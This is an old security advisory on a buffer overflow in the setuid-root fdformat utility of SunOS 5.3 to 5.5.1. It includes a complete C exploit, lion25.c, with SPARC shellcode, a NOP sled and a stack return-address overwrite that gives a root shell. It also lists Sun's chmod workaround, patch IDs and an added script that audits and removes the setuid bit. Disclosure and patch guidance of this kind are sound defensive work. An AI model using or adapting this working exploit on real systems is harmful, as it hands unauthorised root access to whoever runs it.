COMMAND
/bin/fdformat
SYSTEMS AFFECTED
SunOS versions 5.3, 5.4, 5.5, 5.5_x86, 5.5.1, and 5.5.1_x86 are
vulnerable.
PROBLEM
fdformat(1) is a utility for formatting both diskettes and PCMCIA
memory cards. Due to insufficient bounds checking on arguments
which are supplied by users, it is possible to overwrite the
internal stack space of the fdformat program while it is
executing. By supplying a carefully designed argument to the
fdformat program, intruders may be able to force fdformat to
execute arbitrary commands. As fdformat is setuid root, this may
allow intruders to run arbitrary commands with root privileges.
The buffer overflow bug in find_media() posted by Cristian Schipor
is present in /bin/fdformat too (on these distributions the
suid-exec bit is on and it is owned by root). By exploiting fdformat
with the suid-exec bit on, anyone can gain a root (or whoever is the
owner of fdformat) shell.
My exploit (with argv[1] you can change the STACK_OFFSET by +/- x,
where x = 8*k, k = 1, 2, 3, ...):
------------------------- lion25.c -------------------------------
/*
 * Solaris 2.5.1 - this exploit was compiled on Solaris 2.4 and tested on
 * 2.5.1
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH   364
#define EXTRA        400
#define STACK_OFFSET 704
#define SPARC_NOP    0xa61cc013

u_char sparc_shellcode[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
;

/* Return the current stack pointer (SPARC: %sp copied into %i0). */
u_long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

int main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen((char *) sparc_shellcode), dso = 0;

    /* Optional argv[1]: adjust STACK_OFFSET by +/- x, x a multiple of 8. */
    if (argc > 1)
        dso = atoi(argv[1]);

    long_p = (u_long *) buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

    /* NOP sled, followed by the shellcode, followed by the return address. */
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i < code_length; i++)
        *char_p++ = sparc_shellcode[i];
    long_p = (u_long *) char_p;
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
           targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
    execl("/bin/fdformat", "fdformat", &buf[1], (char *) 0);
    perror("execl failed");
    return 1;
}
----------------------- end of lion25.c --------------------------
SOLUTION
Sun recommends, as a workaround, that setuid permission be
removed from the eject and fdformat programs by using commands
such as the following:
chmod 555 /usr/bin/fdformat
The same vulnerabilities have been fixed in the upcoming release
of Solaris 2.6. The vulnerabilities relating to fdformat in the
volume management library are fixed by the following patches:
OS version        Patch ID
---------------   ---------
SunOS 5.5.1       104776-01
SunOS 5.5.1_x86   104777-01
SunOS 5.5         103024-02
SunOS 5.5_x86     103044-02
SunOS 5.4         101907-14
SunOS 5.4_x86     101908-14
SunOS 5.3         101331-07
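As an added administrator's helper (not part of Sun's advisory), the script below audits whether the fdformat and eject binaries named in the workaround still carry the setuid bit, and can apply the advisory's chmod 555 workaround; the path /usr/bin/eject is assumed from the advisory naming eject alongside fdformat.

```sh
#!/bin/sh
# Audit helper for the fdformat setuid workaround (added example, not
# from the original advisory). Usage: script.sh --audit | --fix

# Returns 0 if FILE has the setuid bit set, 1 if not or if it is missing.
is_setuid() {
    [ -u "$1" ]
}

# Prints "SETUID <path>", "ok <path>" or "missing <path>" per argument.
# Returns 0 when nothing is setuid, 1 when at least one binary still is.
audit_setuid() {
    found=0
    for f in "$@"; do
        if [ ! -e "$f" ]; then
            echo "missing $f"
        elif is_setuid "$f"; then
            echo "SETUID $f"
            found=1
        else
            echo "ok $f"
        fi
    done
    return "$found"
}

# Applies Sun's workaround (mode 555) only to files that are still setuid,
# so it is safe to rerun; prints "fixed <path>" for each change.
apply_workaround() {
    for f in "$@"; do
        if [ -e "$f" ] && is_setuid "$f"; then
            chmod 555 "$f" && echo "fixed $f"
        fi
    done
}

# Binaries named in the advisory's workaround (/bin is a link to /usr/bin).
FDFORMAT_PATHS="/usr/bin/fdformat /usr/bin/eject"

if [ "${1:-}" = "--fix" ]; then
    apply_workaround $FDFORMAT_PATHS
elif [ "${1:-}" = "--audit" ]; then
    audit_setuid $FDFORMAT_PATHS
fi
```

Run with --audit from a periodic job; a non-zero exit status means a setuid copy is still present and the patch or workaround has not been applied.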